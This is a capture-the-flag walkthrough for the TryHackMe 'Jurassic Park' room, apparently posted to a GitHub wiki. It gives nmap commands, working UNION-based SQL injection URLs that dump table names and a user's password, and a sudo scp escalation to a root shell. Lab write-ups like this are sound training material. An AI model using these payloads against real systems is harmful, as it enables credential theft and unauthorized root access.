Jurassic Park (TryHackMe) - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki

Jurassic Park Write-up


This is the writeup for the Jurassic Park CTF on TryHackMe. The box involves a UNION-based SQL injection in the web shop to pull credentials for a Linux server, followed by a classic privilege escalation through a binary that dennis is allowed to run with sudo.

https://tryhackme.com/room/jurassicpark


tags: sqli, dinosaurs, linux_privesc

ENUMERATION

First, let's kick things off with a fast nmap scan to get a quick lay of the land.

export IP=10.10.82.128

nmap -F $IP

Next, we'll start another scan in the background to check scripts and the higher ports.

sudo nmap -sC -sV -A -p- $IP -oN nmap.script.scan.txt

This scan doesn't turn up anything else of use: only SSH and a web server on port 80 are exposed. Let's move on to walking the website on port 80; with any luck the site leaks credentials we can reuse to log into the server over SSH.

WALKING THE WEBSITE

On the landing page we see a link to a store and hear the JP theme song. A quick look at the page source shows an assets directory. This directory is browsable and contains a bunch of images, sounds, and a few gifs.

Looking at how the address changes for each of the packages in the store, I noticed a pattern in the query string: item.php?id=1, id=2, id=3. Playing around with this I tried id=4 and id=5 and discovered a message on the id=5 page.

Here is the secret message: [screenshot of the id=5 page]

SQLmap

I also fired up sqlmap against the id parameter to see if it would find anything on its own. It scanned for a long time but didn't come up with anything in the end, which is consistent with the filtering mentioned in the id=5 message: sqlmap's default payloads rely on characters the application blocks.

SQL injection

So we know that we are dealing with a database-backed page and that a few characters have been blocked by the admin. The id parameter is used as a number, so no quote characters are needed to break out of the original query. After toying around with some different SQL injection techniques, I was able to display the database name and the DBMS version with the following URL (the original query selects five columns, so the UNION has to supply five; the numbers are just fillers, and columns 2 and 4 are the ones the page renders):

http://10.10.169.116/item.php?id=5%20union%20all%20select%20101,database(),365,version(),5

Further enumeration led me to expose the table names of the current database via information_schema:

http://10.10.169.116/item.php?id=1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = database()

And the columns of the table 'users':

http://10.10.169.116/item.php?id=1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"

And finally we can grab the password:

http://10.10.169.116/item.php?id=5 union select 1,2,3,password,5 from users

Assuming that the Dennis mentioned in the ?id=5 message is also a username on the server, let's go ahead and SSH into the box with the recovered password.

ssh dennis@$IP

LOCAL ENUMERATION AND EXPLOITATION

Once on the box, checking which commands dennis may run with sudo shows a curious permission: scp.

sudo -l

The bash history reveals some juicy details, including a few flags and a curious use of the scp command.

history

Checking the vim history also reveals another flag.

Linux Privesc

Let's check GTFOBins to see whether scp, when it can be run under sudo, gives us a root shell. It does: scp's -S option names the program scp should use to open the connection, and scp simply executes it. Because sudo runs scp as root, whatever we point -S at runs as root too.

We can perform this privesc with the following commands (the x and y: arguments are just a dummy local file and remote target so that scp gets as far as launching the "ssh" program):

TF=$(mktemp)

echo 'sh 0<&2 1>&2' > $TF

chmod +x "$TF"

sudo scp -S $TF x y:

And we now have elevated our permissions to the root user!

The final flag can be captured by running the script in dennis' home folder as root, or by locating it with find and then catting it out.

Thanks for reading!
